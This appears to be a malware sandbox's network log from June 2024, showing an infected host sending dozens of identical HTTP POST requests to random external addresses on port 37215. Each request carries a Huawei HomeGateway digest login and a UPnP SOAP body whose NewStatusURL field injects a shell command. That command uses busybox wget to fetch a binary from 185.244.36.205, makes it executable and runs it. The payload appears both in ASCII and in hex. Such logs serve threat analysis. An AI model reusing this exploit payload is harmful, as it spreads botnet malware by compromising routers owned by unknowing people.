                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1090192.168.2.1547354186.70.206.11337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929814100 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1091192.168.2.1540556156.131.86.23637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929841995 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1092192.168.2.1552274190.159.202.1137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929843903 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1093192.168.2.1557690157.252.231.16937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929857016 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1094192.168.2.1546882121.19.178.24037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929887056 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1095192.168.2.1538974222.56.28.5237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929892063 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1096192.168.2.1546570157.85.135.4637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929900885 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1097192.168.2.155955641.205.205.13537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929933071 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1098192.168.2.1550440156.194.69.13037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929934978 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1099192.168.2.153394837.80.240.14337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929949045 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1100192.168.2.1535192197.238.78.1737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929995060 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
